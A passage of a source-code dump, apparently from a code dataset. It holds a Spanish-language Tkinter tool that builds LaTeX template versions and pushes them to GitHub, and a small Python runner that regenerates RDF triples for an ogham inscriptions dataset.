try:
# noinspection PyUnresolvedReferences
from PIL import ImageTk
except ImportError:
PIL_EXIST = False
# Constantes
GITHUB_PDF_COMMIT = 'Se agrega pdf v{0} de {1}'
GITHUB_PRINT_MSG = 'SUBIENDO v{0} DE {1} ... '
GITHUB_REP_COMMIT = 'Version {0}'
GITHUB_STAT_COMMIT = 'Estadisticas compilacion v{0} de {1}'
GITHUB_UPDATE_COMMIT = 'Update upload.json'
HELP = {
'ESC': 'Cierra la aplicación',
'F1': 'Muestra esta ayuda',
'F2': 'Muestra las configuraciones',
'F3': 'Muestra el acerca de',
'F4': 'Limpia la ventana',
'ENTER': 'Inicia la rutina'
}
LIMIT_MESSAGES_CONSOLE = 1000
LOG_FILE = 'log.txt'
LOG_MSG = {
'CHANGED': 'Cambiando subrelease a {0} v{1}',
'CONFIG': 'Estableciendo parametro <{0}> en <{1}>',
'COPY': 'Copiando version {0} de {1} al portapapeles',
'CREATE_V': 'Creando version {0} de {1}',
'CREATE_V_COMPLETE': 'Proceso finalizado',
'END': 'Programa cerrado',
'OPEN': 'Inicio Export-Subtemplate v{0}',
'OTHER': '{0}',
'PRINTCONFIG': 'Mostrando configuraciones',
'SHOWABOUT': 'Mostrando acerca de',
'SHOWHELP': 'Mostrando la ayuda',
'SUBV+': 'Creando subversion mayor de {0} a {1}',
'SUBV-': 'Creando subversion menor de {0} a {1}',
'UPLOAD_COMPLETE': 'Carga completa',
'UPLOAD_V': 'Subiendo version {0} de {1} a GitHub',
}
TITLE = 'Export-Subtemplate'
TITLE_LOADING = '{0} | Espere ...'
TITLE_UPLOADING = '{0} | Cargando a GitHub ...'
# noinspection PyCompatibility,PyBroadException,PyCallByClass,PyUnusedLocal,PyShadowingBuiltins
class CreateVersion(object):
"""
Pide la versión al usuario y genera releases.
"""
def __init__(self):
def _checkver(*args):
"""
Función auxiliar que chequea que la versión ingresada sea correcta.
:param sv: String var de la versión
:return:
"""
ver = self._versionstr.get()
try:
v, dev, h = mk_version(ver)
if not validate_ver(dev, self._lastloadedv):
raise Exception('Version invalida')
self._startbutton.configure(state='normal', cursor='hand2')
self._versiontxt.bind('<Return>', self._start)
self._validversion = True
except Exception as exc:
print(exc)
self._startbutton.configure(state='disabled', cursor='arrow')
self._versiontxt.bind('<Return>')
self._validversion = False
def _create_ver_d(*args):
"""
Crea una subversión mayor.
:param args: Argumentos opcionales
:return:
"""
for j in RELEASES.keys():
if self._release.get() == RELEASES[j]['NAME']:
v = get_last_ver(self._getconfig('STATS_ROOT') + RELEASES[j]['STATS']['FILE']).split(' ')[0]
self._versionstr.set(v_down(v))
self._startbutton.focus_force()
self._log('SUBV-', text=[RELEASES[j]['NAME'], v])
return
def _create_ver_u(*args):
"""
Crea una versión mayor.
:param args: Argumentos opcionales
:return:
"""
for j in RELEASES.keys():
if self._release.get() == RELEASES[j]['NAME']:
v = get_last_ver(self._getconfig('STATS_ROOT') + RELEASES[j]['STATS']['FILE']).split(' ')[0]
self._versionstr.set(v_up(v))
self._startbutton.focus_force()
self._log('SUBV+', text=[RELEASES[j]['NAME'], v])
return
def _copyver(*args):
"""
Copia la versión del template seleccionado en el clipboard.
:param args: Argumentos opcionales
:return:
"""
for j in RELEASES.keys():
if self._release.get() == RELEASES[j]['NAME']:
v = get_last_ver(self._getconfig('STATS_ROOT') + RELEASES[j]['STATS']['FILE']).split(' ')[0]
extlbcbpaste(self._getconfig('CLIPBOARD_FORMAT').format(v))
if self._getconfig('INFOCONSOLE'):
self._print('INFO: VERSION COPIADA')
self._log('COPY', text=[v, RELEASES[j]['NAME']])
return
if self._getconfig('INFOCONSOLE'):
self._print('ERROR: TEMPLATE NO ESCOGIDO')
extlbcbpaste('')
def _clear(*args):
"""
Limpia la ventana.
:param args: Argumentos opcionales
:return:
"""
self._clearconsole(-1)
self._release.set('Seleccione template')
self._versiontxt.delete(0, 'end')
self._root.focus()
def _kill(*args):
"""
Destruye la ventana.
:return:
"""
def _oskill():
if is_windows():
os.system('taskkill /PID {0} /F'.format(str(os.getpid())))
else:
os.kill(os.getpid(), signal.SIGKILL)
self._log('END')
self._root.destroy()
exit()
def _printconfig(*args):
"""
Imprime las configuraciones.
:param args: Argumentos opcionales
:return: None
"""
self._clearconsole()
self._print('CONFIGURACIONES')
maxlen = 0
key = self._configs.keys()
key.sort(key=natural_keys)
for j in key:
if self._configs[j]['EVENT']:
maxlen = max(maxlen, len(j))
for j in key:
if self._configs[j]['EVENT']:
self._print('\t{0} [{1}]'.format(j.ljust(maxlen), self._getconfig(j)))
for j in range(5):
self._print('\n')
self._log('PRINTCONFIG')
def _scroll_console(event):
"""
Función que atrapa el evento del scrolling y mueve los comandos.
:param event: Evento
:return: None
"""
if -175 < event.x < 240 and 38 < event.y < 136:
if is_windows():
if -1 * (event.delta / 100) < 0:
move = -1
else:
move = 2
elif is_osx():
if -1 * event.delta < 0:
move = -2
else:
move = 2
else:
if -1 * (event.delta / 100) < 0:
move = -1
else:
move = 2
if len(self._console) < 5 and move < 0:
return
self._info_slider.canv.yview_scroll(move, 'units')
def _set_config(paramname, paramvalue, *args):
"""
Guarda la configuración.
:param paramname: Nombre del parámetro
:param paramvalue: Valor del parámetro
:return:
"""
if paramvalue == '!':
self._configs[paramname]['VALUE'] = not self._configs[paramname]['VALUE']
else:
self._configs[paramname]['VALUE'] = paramvalue
vl = [paramname, self._configs[paramname]['VALUE']]
self._print('SE ESTABLECIO <{0}> EN {1}'.format(*vl))
self._log('CONFIG', text=vl, mode='CFG')
def _set_templatever(template_name, *args):
"""
Establece el tipo de template en la lista.
:param template_name: ID del template
:return:
"""
self._release.set(template_name)
def _show_about(*args):
"""
Imprime acerca de en consola.
:param args: Argumentos opcionales
:return: None
"""
self._clearconsole(-1)
self._print('ACERCA DE')
self._print('\tExport Template v{0}'.format(__version__))
self._print('\tAutor: {0}\n'.format(__author__))
license = file_to_list(EXTLBX_LICENSE)
for line in license:
self._print(line.strip(), scrolldir=-1)
self._log('SHOWABOUT')
def _show_help(*args):
"""
Imprime la ayuda en consola.
:param args: Argumentos opcionales
:return: None
"""
self._clearconsole(-1)
self._print('AYUDA')
keys = list(HELP.keys())
keys.sort()
for k in keys:
self._print('\t{0}: {1}'.format(k, HELP[k]), scrolldir=-1)
self._log('SHOWHELP')
def _update_ver(*args):
"""
Pasa el foco al campo de versión, carga versiones de cada release.
:param args: Argumentos opcionales
:return:
"""
self._versiontxt.focus()
self._versionstr.trace_vdelete('w', self._versiontrace)
self._versionstr.set('')
self._versiontrace = self._versionstr.trace('w', self._checkver)
self._clearconsole()
for j in RELEASES.keys():
if self._release.get() == RELEASES[j]['NAME']:
v = get_last_ver(self._getconfig('STATS_ROOT') + RELEASES[j]['STATS']['FILE'])
self._versiontxt.configure(state='normal')
self._print('SELECCIONADO: {0}'.format(RELEASES[j]['NAME']))
self._print('ÚLTIMA VERSIÓN: {0}'.format(v))
if self._uploaded[j] != v.split(' ')[0]:
self._uploadstatebtn('on')
else:
self._uploadstatebtn('off')
self._lastloadedv = v.split(' ')[0]
self._log('CHANGED', text=[RELEASES[j]['NAME'], v])
return
self._root = tk.Tk()
self._root.protocol('WM_DELETE_WINDOW', _kill)
self._root.tk.call('tk', 'scaling', 1.35)
self._sounds = Sound()
# Se obtienen configuraciones
with open(EXTLBX_CONFIGS) as json_data:
d = json.load(json_data)
self._configs = d
self._lascpdf = True
self._lastsav = True
# Se obtiene el root del archivo actual
self._configs["MAIN_ROOT"]["VALUE"] = str(os.path.abspath(os.path.dirname(__file__))).replace('\\', '/') + '/'
# Ajusta tamaño ventana
size = [self._configs['WINDOW_SIZE']['WIDTH'], self._configs['WINDOW_SIZE']['HEIGHT']]
self._root.minsize(width=size[0], height=size[1])
self._root.geometry('%dx%d+%d+%d' % (size[0], size[1], (self._root.winfo_screenwidth() - size[0]) / 2,
(self._root.winfo_screenheight() - size[1]) / 2))
self._root.resizable(width=False, height=False)
self._root.focus_force()
# Estilo ventana
self._root.title(TITLE)
if is_osx():
self._root.iconbitmap(EXTLBX_ICON_MAC)
img = tk.Image('photo', file=EXTLBX_ICON_MAC)
# noinspection PyProtectedMember
self._root.tk.call('wm', 'iconphoto', self._root._w, img)
else:
self._root.iconbitmap(EXTLBX_ICON)
fonts = [font.Font(family='Courier', size=13 if is_osx() else 8),
font.Font(family='Verdana', size=6),
font.Font(family='Times', size=10),
font.Font(family='Times', size=10, weight=font.BOLD),
font.Font(family='Verdana', size=6, weight=font.BOLD),
font.Font(family='Verdana', size=10),
font.Font(family='Verdana', size=7)]
f1 = tk.Frame(self._root, border=5)
f1.pack(fill=tk.X)
f2 = tk.Frame(self._root)
f2.pack(fill=tk.BOTH)
# Selección versión a compilar
rels = []
p = 1
ky = list(RELEASES.keys())
ky.sort()
for b in ky:
rels.append(RELEASES[b]['NAME'])
self._root.bind('<Control-Key-{0}>'.format(p), partial(_set_templatever, RELEASES[b]['NAME']))
p += 1
self._release = tk.StringVar(self._root)
self._release.set('Seleccione template')
w = tk.OptionMenu(f1, self._release, *tuple(rels))
w['width'] = 17 if is_osx() else 24
w['relief'] = tk.GROOVE
w['anchor'] = tk.W
w['cursor'] = 'hand2'
w.pack(side=tk.LEFT)
self._release.trace('w', _update_ver)
# Campo de texto para versión
tk.Label(f1, text='Nueva versión:').pack(side=tk.LEFT, padx=5)
self._checkver = _checkver
self._versionstr = tk.StringVar(self._root)
self._versiontrace = self._versionstr.trace('w', self._checkver)
self._versiontxt = tk.Entry(f1, relief=tk.GROOVE, width=5 if is_osx() else 10,
font=fonts[5], textvariable=self._versionstr)
self._versiontxt.configure(state='disabled')
self._versiontxt.pack(side=tk.LEFT, padx=5, pady=2)
self._versiontxt.focus()
self._validversion = False
self._lastloadedv = ''
# Botón iniciar
self._startbutton = tk.Button(f1, text='Iniciar', state='disabled', relief=tk.GROOVE, command=self._start)
self._startbutton.pack(side=tk.LEFT, padx=3, anchor=tk.W)
# Uploads
if PIL_EXIST:
self._upload_imgs = [
ImageTk.PhotoImage(file=EXTLBX_BTN_UPLOAD),
ImageTk.PhotoImage(file=EXTLBX_BTN_UPLOAD_DISABLED)
]
self._uploadbutton = tk.Button(f1, image=self._upload_imgs[0], relief=tk.GROOVE, height=20, width=20,
command=self._upload_github, border=0)
else:
self._uploadbutton = tk.Button(f1, relief=tk.GROOVE, height=20, width=20,
command=self._upload_github, border=0)
self._upload_imgs = None
self._uploadbutton.pack(side=tk.RIGHT, padx=2, anchor=tk.E)
self._uploadstatebtn('off')
self._checkuploaded()
# Consola
self._info_slider = VerticalScrolledFrame(f2)
self._info_slider.canv.config(bg='#000000')
self._info_slider.pack(pady=2, anchor=tk.NE, fill=tk.BOTH, padx=1)
self._info = tk.Label(self._info_slider.interior, text='', justify=tk.LEFT, anchor=tk.NW, bg='black',
fg='white',
wraplength=self._configs['WINDOW_SIZE']['WIDTH'],
font=fonts[0], relief=tk.FLAT, border=2,
cursor='arrow')
self._info.pack(anchor=tk.NW, fill=tk.BOTH)
self._info_slider.scroller.pack_forget()
self._console = []
self._cnextnl = False
# Eventos
self._root.bind('<Control-q>', _kill)
self._root.bind('<Control-z>', _copyver)
self._root.bind('<Down>', _create_ver_d)
self._root.bind('<Escape>', _kill)
self._root.bind('<F1>', _show_help)
self._root.bind('<F2>', _printconfig)
self._root.bind('<F3>', _show_about)
self._root.bind('<F4>', _clear)
self._root.bind('<MouseWheel>', _scroll_console)
self._root.bind('<Return>', self._start)
self._root.bind('<Up>', _create_ver_u)
for i in self._configs.keys():
if self._configs[i]['EVENT']:
self._root.bind(self._configs[i]['KEY'], partial(_set_config, i, '!'))
HELP[self._configs[i]['KEY'].replace('<', '').replace('>', '')] = 'Activa/Desactiva {0}'.format(i)
# Se agrega entrada al log
self._log('OPEN', text=__version__)
def _checkuploaded(self):
"""
Chequea los archivos cargados a github.
:return:
"""
with open(EXTLBX_UPLOAD) as json_data:
self._uploaded = json.load(json_data)
for j in RELEASES.keys():
if j not in self._uploaded:
self._uploaded[j] = '0.0.0'
def _clearconsole(self, scrolldir=1):
"""
Limpia la consola.
:param scrolldir: Dirección del scroll
:return:
"""
# noinspection PyShadowingNames
def _slide(*args):
"""
Mueve el scroll.
:return: None
"""
self._info_slider.canv.yview_scroll(1000 * scrolldir, 'units')
self._console = []
self._info.config(text='')
self._root.after(10, _slide)
def _getconfig(self, paramname):
"""
Obtiene el valor de la configuración.
:param paramname: Nombre del parámetro de la configuración
:return:
"""
return self._configs[paramname]['VALUE']
def _print(self, msg, hour=False, end=None, scrolldir=1):
"""
Imprime mensaje en consola.
:param msg: Mensaje
:param hour: Muestra la hora
:param scrolldir: Dirección del scroll
:return: None
"""
def _consoled(c):
"""
Función que genera un string con una lista.
:param c: Lista
:return: Texto
"""
text = ''
for i in c:
text = text + i + '\n'
return text
def _get_hour():
"""
Función que retorna la hora de sistema.
:return: String
"""
return time.ctime(time.time())[11:20]
def _slide(*args):
"""
Mueve el scroll.
:return: None
"""
self._info_slider.canv.yview_scroll(2000 * scrolldir, 'units')
try:
msg = str(msg)
if hour:
msg = _get_hour() + ' ' + msg
if len(self._console) == 0 or self._console[len(self._console) - 1] != msg:
if self._cnextnl:
self._console[len(self._console) - 1] += msg
else:
self._console.append(msg)
if end == '':
self._cnextnl = True
else:
self._cnextnl = False
if len(self._console) > LIMIT_MESSAGES_CONSOLE:
self._console.pop()
self._info.config(text=_consoled(self._console))
self._root.after(50, _slide)
except:
self._clearconsole()
def execute(self):
"""
Inicia la ventana.
:return:
"""
self._root.mainloop()
@staticmethod
def _log(msg, mode='INFO', text=''):
"""
Crea una entrada en el log.
:type text: str, list
:return:
"""
try:
d = time.strftime('%d/%m/%Y %H:%M:%S')
with open(LOG_FILE, 'a') as logfile:
if isinstance(text, list):
logfile.write('{1} [{0}] {2}\n'.format(d, mode, LOG_MSG[msg].format(*text)))
else:
logfile.write('{1} [{0}] {2}\n'.format(d, mode, LOG_MSG[msg].format(text)))
except:
dt = open(LOG_FILE, 'w')
dt.close()
def _saveupload(self):
"""
Guarda los uploads en el json.
:return:
"""
with open(EXTLBX_UPLOAD, 'w') as outfile:
json.dump(self._uploaded, outfile)
def _start(self, *args):
"""
Genera la versión ingresada.
:return:
"""
def _scroll():
self._info_slider.canv.yview_scroll(1000, 'units')
def _callback():
t = 0
lastv = ''
msg = ''
relnm = ''
for j in RELEASES.keys():
if self._release.get() == RELEASES[j]['NAME']:
t = RELEASES[j]['ID']
lastv = get_last_ver(self._getconfig('STATS_ROOT') + RELEASES[j]['STATS']['FILE']).split(' ')[0]
msg = RELEASES[j]['MESSAGE']
relnm = RELEASES[j]['NAME']
break
# Se crea la versión
ver, versiondev, versionhash = mk_version(self._versionstr.get())
# Se comprueba versiones
if not validate_ver(versiondev, lastv):
messagebox.showerror('Error', 'La versión nueva debe ser superior a la actual ({0}).'.format(lastv))
self._print('ERROR: VERSIÓN INCORRECTA')
else:
try:
self._print(msg.format(versiondev))
self._log('CREATE_V', text=[versiondev, relnm])
if t == 1:
try:
export_informe(ver, versiondev, versionhash,
printfun=self._print,
doclean=True,
dosave=self._getconfig('SAVE'),
docompile=self._getconfig('COMPILE'),
addstat=self._getconfig('SAVE_STAT'),
backtoroot=True,
plotstats=self._getconfig('PLOT_STAT'),
mainroot=self._getconfig('MAIN_ROOT'),
informeroot=self._getconfig('INFORME_ROOT'),
statsroot=self._getconfig('STATS_ROOT'))
except:
logging.exception('Error al generar informe')
clear_dict(RELEASES[REL_INFORME], 'FILES')
elif t == 2:
try:
export_auxiliares(ver, versiondev, versionhash,
printfun=self._print,
dosave=self._getconfig('SAVE'),
docompile=self._getconfig('COMPILE'),
addstat=self._getconfig('SAVE_STAT'),
plotstats=self._getconfig('PLOT_STAT'),
savepdf=self._getconfig('SAVE_PDF'),
mainroot=self._getconfig('MAIN_ROOT'),
informeroot=self._getconfig('INFORME_ROOT'),
statsroot=self._getconfig('STATS_ROOT'))
except:
logging.exception('Error al generar auxiliares')
clear_dict(RELEASES[REL_INFORME], 'FILES')
clear_dict(RELEASES[REL_AUXILIAR], 'FILES')
elif t == 3:
try:
export_controles(ver, versiondev, versionhash,
printfun=self._print,
dosave=self._getconfig('SAVE'),
docompile=self._getconfig('COMPILE'),
addstat=self._getconfig('SAVE_STAT'),
plotstats=self._getconfig('PLOT_STAT'),
savepdf=self._getconfig('SAVE_PDF'),
mainroot=self._getconfig('MAIN_ROOT'),
informeroot=self._getconfig('INFORME_ROOT'),
statsroot=self._getconfig('STATS_ROOT'))
except:
logging.exception('Error al generar controles')
clear_dict(RELEASES[REL_INFORME], 'FILES')
clear_dict(RELEASES[REL_AUXILIAR], 'FILES')
clear_dict(RELEASES[REL_CONTROLES], 'FILES')
elif t == 4:
try:
export_cv(ver, versiondev, versionhash, printfun=self._print,
dosave=self._getconfig('SAVE'),
docompile=self._getconfig('COMPILE'),
addstat=self._getconfig('SAVE_STAT'),
plotstats=self._getconfig('PLOT_STAT'),
savepdf=self._getconfig('SAVE_PDF'),
mainroot=self._getconfig('MAIN_ROOT'),
statsroot=self._getconfig('STATS_ROOT'),
backtoroot=True)
except:
logging.exception('Error al generar cv')
clear_dict(RELEASES[REL_PROFESSIONALCV], 'FILES')
elif t == 5:
try:
export_reporte(ver, versiondev, versionhash, printfun=self._print,
dosave=self._getconfig('SAVE'),
docompile=self._getconfig('COMPILE'),
addstat=self._getconfig('SAVE_STAT'),
plotstats=self._getconfig('PLOT_STAT'),
savepdf=self._getconfig('SAVE_PDF'),
mainroot=self._getconfig('MAIN_ROOT'),
statsroot=self._getconfig('STATS_ROOT'),
informeroot=self._getconfig('INFORME_ROOT'))
except:
logging.exception('Error al generar reporte')
clear_dict(RELEASES[REL_INFORME], 'FILES')
clear_dict(RELEASES[REL_REPORTE], 'FILES')
elif t == 6:
try:
export_tesis(ver, versiondev, versionhash, printfun=self._print,
dosave=self._getconfig('SAVE'),
docompile=self._getconfig('COMPILE'),
addstat=self._getconfig('SAVE_STAT'),
plotstats=self._getconfig('PLOT_STAT'),
savepdf=self._getconfig('SAVE_PDF'),
mainroot=self._getconfig('MAIN_ROOT'),
statsroot=self._getconfig('STATS_ROOT'),
informeroot=self._getconfig('INFORME_ROOT'))
except:
logging.exception('Error al generar tesis')
clear_dict(RELEASES[REL_INFORME], 'FILES')
clear_dict(RELEASES[REL_TESIS], 'FILES')
elif t == 7:
try:
export_presentacion(ver, versiondev, versionhash, printfun=self._print,
dosave=self._getconfig('SAVE'),
docompile=self._getconfig('COMPILE'),
addstat=self._getconfig('SAVE_STAT'),
plotstats=self._getconfig('PLOT_STAT'),
savepdf=self._getconfig('SAVE_PDF'),
mainroot=self._getconfig('MAIN_ROOT'),
statsroot=self._getconfig('STATS_ROOT'),
informeroot=self._getconfig('INFORME_ROOT'))
except:
logging.exception('Error al generar presentacion')
clear_dict(RELEASES[REL_INFORME], 'FILES')
clear_dict(RELEASES[REL_PRESENTACION], 'FILES')
elif t == 8:
try:
export_articulo(ver, versiondev, versionhash, printfun=self._print,
dosave=self._getconfig('SAVE'),
docompile=self._getconfig('COMPILE'),
addstat=self._getconfig('SAVE_STAT'),
plotstats=self._getconfig('PLOT_STAT'),
savepdf=self._getconfig('SAVE_PDF'),
mainroot=self._getconfig('MAIN_ROOT'),
statsroot=self._getconfig('STATS_ROOT'),
informeroot=self._getconfig('INFORME_ROOT'))
except:
logging.exception('Error al generar articulo')
clear_dict(RELEASES[REL_INFORME], 'FILES')
clear_dict(RELEASES[REL_REPORTE], 'FILES')
clear_dict(RELEASES[REL_ARTICULO], 'FILES')
elif t == 9:
try:
export_poster(ver, versiondev, versionhash, printfun=self._print,
dosave=self._getconfig('SAVE'),
docompile=self._getconfig('COMPILE'),
addstat=self._getconfig('SAVE_STAT'),
plotstats=self._getconfig('PLOT_STAT'),
savepdf=self._getconfig('SAVE_PDF'),
mainroot=self._getconfig('MAIN_ROOT'),
statsroot=self._getconfig('STATS_ROOT'),
informeroot=self._getconfig('INFORME_ROOT'))
except:
logging.exception('Error al generar poster')
clear_dict(RELEASES[REL_INFORME], 'FILES')
clear_dict(RELEASES[REL_PRESENTACION], 'FILES')
clear_dict(RELEASES[REL_POSTER], 'FILES')
else:
raise Exception('ERROR: ID INCORRECTO')
self._lastsav = self._getconfig('SAVE')
self._lascpdf = self._getconfig('COMPILE') and self._getconfig('SAVE_PDF')
self._print(' ')
if self._lastsav:
self._uploadstatebtn('on')
except Exception as e:
messagebox.showerror('Error fatal', 'Ocurrio un error inesperado al procesar la solicitud.')
self._log('OTHER', text=str(e), mode='ERROR')
self._print('ERROR: EXCEPCIÓN INESPERADA')
self._print(str(e))
self._print(traceback.format_exc())
self._sounds.alert()
self._root.configure(cursor='arrow')
self._root.title(TITLE)
self._versionstr.trace_vdelete('w', self._versiontrace)
self._versionstr.set('')
self._versiontrace = self._versionstr.trace('w', self._checkver)
self._root.update()
self._root.after(50, _scroll)
self._log('CREATE_V_COMPLETE')
return
if not self._validversion:
return
self._root.title(TITLE_LOADING.format(TITLE))
self._root.configure(cursor='wait')
self._root.update()
self._root.after(500, _callback)
self._startbutton.configure(state='disabled')
self._uploadstatebtn('off')
return
def _uploadstatebtn(self, state):
"""
Cambia el estado del botón upload.
:param state: Estado
:return:
"""
if state == 'on':
self._uploadbutton.configure(state='normal')
self._uploadbutton.configure(cursor='hand2')
if self._upload_imgs:
self._uploadbutton.configure(image=self._upload_imgs[0])
self._uploadbutton.image = self._upload_imgs[0]
else:
self._uploadbutton.configure(state='disabled')
self._uploadbutton.configure(cursor='arrow')
if self._upload_imgs:
self._uploadbutton.configure(image=self._upload_imgs[1])
self._uploadbutton.image = self._upload_imgs[1]
self._uploadbutton.update()
def _upload_github(self, *args):
"""
Sube la versión a github.
:param args: Argumentos opcionales
:return: None
"""
def _scroll():
self._info_slider.canv.yview_scroll(1000, 'units')
def _callback():
t = 0
lastv = ''
jver = ''
lastvup = ''
for j in RELEASES.keys():
if self._release.get() == RELEASES[j]['NAME']:
lastv = get_last_ver(self._getconfig('STATS_ROOT') + RELEASES[j]['STATS']['FILE']).split(' ')[0]
lastvup = lastv.split('-')[0]
jver = j
self._log('UPLOAD_V', text=[lastvup, RELEASES[j]['NAME']])
break
# Sube el contenido a la plataforma
try:
# Se cambia el path
os.chdir(self._getconfig('MAIN_ROOT'))
cmsg = GITHUB_REP_COMMIT.format(lastv)
# Se llama a consola para añadir carpeta a git
t = time.time()
with open(os.devnull, 'w') as FNULL:
with Cd(RELEASES[jver]['GIT']):
call(['git', 'add', '--all'], stdout=FNULL)
call(['git', 'commit', '-m', cmsg], stdout=FNULL)
call(['git', 'push'], stdout=FNULL, stderr=FNULL)
# Se sube archivo pdf
pdf_file = RELEASES[jver]['PDF_FOLDER'].format(lastvup)
cmsg = GITHUB_PDF_COMMIT.format(lastv, RELEASES[jver]['NAME'])
if os.path.isfile(pdf_file) and self._lascpdf:
with open(os.devnull, 'w') as FNULL:
with Cd(self._getconfig('PDF_ROOT')):
pdf_file = pdf_file.replace(self._getconfig('PDF_ROOT'), '')
call(['git', 'add', pdf_file], stdout=FNULL)
call(['git', 'commit', '-m', cmsg], stdout=FNULL)
call(['git', 'push'], stdout=FNULL, stderr=FNULL)
# Se sube estadísticas
cmsg = GITHUB_STAT_COMMIT.format(lastv, RELEASES[jver]['NAME'])
with open(os.devnull, 'w') as FNULL:
with Cd(self._getconfig('STATS_ROOT') + 'stats/'):
call(['git', 'add', RELEASES[jver]['STATS']['GIT_ADD']], stdout=FNULL)
call(['git', 'commit', '-m', cmsg], stdout=FNULL)
call(['git', 'push'], stdout=FNULL, stderr=FNULL)
# Se guarda la versión
self._uploaded[jver] = lastv
self._saveupload()
# Se actualiza archivo updates
# cmsg = GITHUB_UPDATE_COMMIT
# with open(os.devnull, 'w') as FNULL:
# with Cd(self._getconfig('MAIN_ROOT')):
# call(['git', 'add', EXTLBX_UPLOAD], stdout=FNULL)
# call(['git', 'commit', '-m', cmsg], stdout=FNULL)
# call(['git', 'push'], stdout=FNULL, stderr=FNULL)
# Se muestra tiempo de subida y se termina el proceso
self._print(MSG_FOKTIMER.format((time.time() - t)))
self._uploadstatebtn('off')
except Exception as e:
messagebox.showerror('Error fatal', 'Ocurrio un error inesperado al procesar la solicitud.')
self._log('OTHER', text=str(e), mode='ERROR')
self._print('ERROR: EXCEPCIÓN INESPERADA')
self._print(str(e))
self._print(traceback.format_exc())
self._sounds.alert()
self._uploadstatebtn('on')
self._log('UPLOAD_COMPLETE')
self._root.configure(cursor='arrow')
self._root.title(TITLE)
self._root.update()
self._root.after(50, _scroll)
return
self._root.title(TITLE_UPLOADING.format(TITLE))
self._root.configure(cursor='wait')
self._root.update()
for k in RELEASES.keys():
if self._release.get() == RELEASES[k]['NAME']:
v = get_last_ver(self._getconfig('STATS_ROOT') + RELEASES[k]['STATS']['FILE']).split(' ')[0]
self._print(GITHUB_PRINT_MSG.format(v, RELEASES[k]['NAME']), end='')
break
self._root.after(500, _callback)
self._uploadstatebtn('off')
if __name__ == '__main__':
CreateVersion().execute()
| 41.908705 | 118 | 0.496124 | 3,817 | 39,478 | 4.937123 | 0.170291 | 0.061396 | 0.025259 | 0.020165 | 0.436668 | 0.397984 | 0.354205 | 0.343115 | 0.330751 | 0.323375 | 0 | 0.010138 | 0.390344 | 39,478 | 941 | 119 | 41.953241 | 0.77281 | 0.02566 | 0 | 0.404355 | 0 | 0 | 0.103419 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.031104 | null | null | 0.059098 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
8fdab9e986f28b972fe777268c5b6d64795df2f2 | 2,740 | py | Python | py/_run_py3.py | FellowsFreiesWissen/- | 3e74e6531985b0e9ba2e34bf1f6a1224cc7b52f3 | [
"MIT"
] | 1 | 2021-02-08T20:33:41.000Z | 2021-02-08T20:33:41.000Z | py/_run_py3.py | FellowsFreiesWissen/- | 3e74e6531985b0e9ba2e34bf1f6a1224cc7b52f3 | [
"MIT"
] | null | null | null | py/_run_py3.py | FellowsFreiesWissen/- | 3e74e6531985b0e9ba2e34bf1f6a1224cc7b52f3 | [
"MIT"
] | 1 | 2021-01-01T17:23:40.000Z | 2021-01-01T17:23:40.000Z | __author__ = "Florian Thiery"
__copyright__ = "MIT Licence 2021, Florian Thiery"
__credits__ = ["Florian Thiery"]
__license__ = "MIT"
__version__ = "1.0"
__maintainer__ = "Florian Thiery"
__email__ = "mail@fthiery.de"
__status__ = "1.0"
__update__ = "2021-05-11"
import glob
import os
import os.path
dir_path = os.path.dirname(os.path.realpath(__file__))
print("start _run_py3.py...")
dir_path_ttl1 = dir_path.replace("\\py", "\\data_v1\\rdf\\ogham")
filelist1 = glob.glob(os.path.join(dir_path_ttl1, "*.ttl"))
for f in filelist1:
os.remove(f)
dir_path_ttl2 = dir_path.replace("\\py", "\\data_v1\\rdf\\geodata")
filelist2 = glob.glob(os.path.join(dir_path_ttl2, "*.ttl"))
for f in filelist2:
os.remove(f)
dir_path_ttl3 = dir_path.replace("\\py", "\\data_v1\\rdf\\crosstaböe")
filelist3 = glob.glob(os.path.join(dir_path_ttl3, "*.ttl"))
for f in filelist3:
os.remove(f)
print("removed all ttl files...")
# ogham
exec(open(dir_path + "/og_sites.py").read())
exec(open(dir_path + "/og_inscriptions.py").read())
exec(open(dir_path + "/og_locations.py").read())
exec(open(dir_path + "/og_persons.py").read())
exec(open(dir_path + "/og_readings.py").read())
exec(open(dir_path + "/og_stones.py").read())
exec(open(dir_path + "/og_words.py").read())
sum_ogham = int(_config.count(0))
# geodata
exec(open(dir_path + "/gs_baronies.py").read())
exec(open(dir_path + "/gs_counties.py").read())
exec(open(dir_path + "/gs_countries.py").read())
exec(open(dir_path + "/gs_ireland_island.py").read())
exec(open(dir_path + "/gs_provinces.py").read())
#exec(open(dir_path + "/gs_townlands.py").read())
step2 = int(_config.count(0))
sum_geodata = step2 - sum_ogham
# crostables
exec(open(dir_path + "/ct_barony_townland.py").read())
exec(open(dir_path + "/ct_country_province.py").read())
exec(open(dir_path + "/ct_county_barony.py").read())
exec(open(dir_path + "/ct_insc_read.py").read())
exec(open(dir_path + "/ct_site_barony.py").read())
exec(open(dir_path + "/ct_site_country.py").read())
exec(open(dir_path + "/ct_site_county.py").read())
exec(open(dir_path + "/ct_site_loc.py").read())
exec(open(dir_path + "/ct_site_province.py").read())
exec(open(dir_path + "/ct_site_townland.py").read())
exec(open(dir_path + "/ct_stone_insc.py").read())
exec(open(dir_path + "/ct_stone_person.py").read())
exec(open(dir_path + "/ct_stone_site.py").read())
exec(open(dir_path + "/ct_stone_squirrel.py").read())
exec(open(dir_path + "/ct_stone_word.py").read())
step3 = int(_config.count(0))
sum_crosstable = step3 - sum_ogham - sum_geodata
print("SUM TRIPLES OGHAM: " + str(sum_ogham))
print("SUM TRIPLES GEODATA: " + str(sum_geodata))
print("SUM TRIPLES CROSSTABLES: " + str(sum_crosstable))
print("SUM TRIPLES: " + str(_config.count(0)))
